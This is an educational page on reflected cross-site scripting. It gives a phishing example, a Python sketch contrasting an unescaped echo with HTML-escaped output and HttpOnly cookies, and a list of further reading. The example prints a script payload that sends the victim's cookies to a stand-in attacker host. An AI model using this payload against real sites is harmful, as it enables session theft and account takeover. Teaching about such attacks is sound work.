Cross Site Scripting (XSS)
Cross Site Scripting (XSS) is a flaw in a website that allows an attacker to insert malicious content into the page returned from the web server. This is typically accomplished by constructing a URL that points to the target website (one that is vulnerable to cross-site scripting). The malicious link is designed to inject malicious commands or HTML that will be reflected back to the person clicking the link. The attacker then attempts to get a victim to click the link.
Let’s look at a phishing attack. A hacker, posing as the administrator of a popular site, sends you an email asking you to click on a link for some fictitious reason. The link is to a page with a cross-site scripting vulnerability. The page takes the name of a product as a parameter, and if the product is not found it returns an error message saying that the product is not found:
https://www.fakesite.com/products.php?product_name=cellphone
This URL returns the following simplified HTML. Note the product name is sent back in the HTML:
<html><body>Could not find the product cellphone</body></html>
The attacker sends you a link instead that looks like this:
http://www.fakesite.com/products.php?product_name=<script>document.location='http://www.hacker.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>
This URL returns the following HTML:
<html><body>Could not find the product <script>document.location='http://www.hacker.com/cgi-bin/cookie.cgi?'%20+document.cookie</script></body></html>
When a user clicks the link, it opens the target website and runs the JavaScript in the victim’s browser, causing the victim’s cookies to be sent to the attacker’s website.
At the other end, the hacker is waiting for these cookies to come across and then uses them to log in to the target website as the victim. [Source]
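The vulnerable echo from products.php next to an output-encoded version, as an added example that is not part of the original post. It is sketched in Python rather than PHP; the function names and the "session" cookie name are assumptions, and the payload is the parameter value from the malicious link above.

```python
import html
from http.cookies import SimpleCookie

TEMPLATE = "<html><body>Could not find the product {}</body></html>"

# Parameter value copied from the page's malicious link (sample input).
PAYLOAD = ("<script>document.location='http://www.hacker.com/cgi-bin/"
           "cookie.cgi?'%20+document.cookie</script>")


def render_vulnerable(product_name: str) -> str:
    """Echo the parameter as-is: any markup in it becomes part of the page."""
    return TEMPLATE.format(product_name)


def render_escaped(product_name: str) -> str:
    """HTML-encode the parameter so the browser displays it as plain text."""
    # quote=True also encodes " and ', which matters inside attribute values.
    return TEMPLATE.format(html.escape(product_name, quote=True))


def session_cookie_header(session_id: str) -> str:
    """Build a Set-Cookie value that page scripts cannot read."""
    cookie = SimpleCookie()
    cookie["session"] = session_id            # cookie name is hypothetical
    cookie["session"]["httponly"] = True      # hidden from document.cookie
    cookie["session"]["secure"] = True        # only sent over HTTPS
    cookie["session"]["samesite"] = "Lax"
    return cookie["session"].OutputString()


if __name__ == "__main__":
    print(render_vulnerable("cellphone"))     # benign request from the page
    print(render_vulnerable(PAYLOAD))         # script tag reaches the browser
    print(render_escaped(PAYLOAD))            # same input, shown as text
    print(session_cookie_header("constructed-session-id"))
```

Encoding at output time removes the injection point; the HttpOnly flag is a second layer that keeps the session cookie out of reach of document.cookie if an unencoded echo slips through elsewhere.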
Cross-Site Scripting poses server application risks that include, but are not limited to, the following:
More on XSS (Cross Site Scripting)
1. XSS (Cross Site Scripting) Prevention Cheat Sheet - XSS Prevention Rules etc
2. Below link contains FAQs about Cross Site Scripting like What is Cross Site Scripting?, What are the threats of Cross Site Scripting?, How common are CSS/XSS holes?, What can I do to protect myself as a user? etc
cgisecurity
3. The Anatomy of Cross Site Scripting: Anatomy, Discovery, Attack, Exploitation
net-security.org
4. Full explanation – the cross-site scripting technique, its Scope and feasibility, ways to perform (traditional) CSS attacks, Securing a site against CSS attacks, How to check if your site is protected from CSS etc.
XSS.pdf
5. Fun Cross Site Scripting Example
6. Below link includes - What is Cross Site Scripting?, The repercussions of XSS, A practical example of XSS on a test site etc.
windowsecurity
7. XSS (Cross Site Scripting) Cheat Sheet
Especially for filter evasion
8. Includes Description of Cross-site scripting Vulnerabilities, How to Avoid Cross-site scripting Vulnerabilities, How to Review Code for Cross-site scripting Vulnerabilities
Testing for Cross site scripting
9. Below link shows how you can help protect your ASP.NET applications from cross-site scripting attacks by using proper input validation techniques and by encoding the output.
How To: Prevent Cross-Site Scripting in ASP.NET
10. Google XSS Vulnerability - The recent cross-site scripting (XSS) vulnerability discovered in Google perfectly illustrates why character encoding matters
11. Cross-site scripting: are your web applications vulnerable? - Includes Introduction to Cross-site scripting, an advanced cross-site scripting attack, Prevention etc (Please look under White Papers)
12. Cross Site Scripting - Understanding the vulnerability and payload
Also See:
Cookie Testing
SQL Injection